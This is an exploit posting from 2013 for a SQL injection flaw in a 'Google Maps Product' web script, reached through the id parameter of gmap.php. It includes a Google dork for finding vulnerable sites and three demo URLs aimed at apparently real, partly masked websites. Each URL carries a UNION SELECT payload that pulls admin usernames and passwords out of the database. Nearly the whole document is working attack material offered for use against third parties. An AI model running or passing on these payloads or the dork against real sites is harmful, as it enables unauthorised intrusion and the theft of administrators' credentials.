# Exploit Title : Google Maps Product (SQL Injection + Blind SQL Injection)
# Date : 28/06/2013
# Exploit Author : S1r_z3r0
# Contact (Facebook Account) : fb.com/100005972977804
# Youtube : youtube.com/user/s1rooo
# Contact (Facebook Page) : fb.com/S1r.z3r0.Jo
# Google Dork : inurl:"gmap.php?id="
+-----------------------------------------------------------------------------------+
+Exploit :
+http://[Target]/[Path]/gmap.php?id=[SQL]
+-----------------------------------------------------------------------------------+
+-----------------------------------------------------------------------------------+
+D3m0 :
+
+http://www.jpaXbasic.com/gmap.php?id=-249%20UNION%20SELECT%201,2,3,4,5,6,7,group_concat%28username,0x3a,password%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20admin
+
+http://www.re1XX00lc.com/gmap.php?id=-193%20union%20select%201,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15%20from%20admins
+
+http://www.freeXXlisting.biz/gmap.php?id=-29%20UNION%20SELECT%201,2,3,4,5,6,7,password,username,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%20from%20admin
+-----------------------------------------------------------------------------------+
=============================
+ Copyright © S1r_z3r0 2013 +
=============================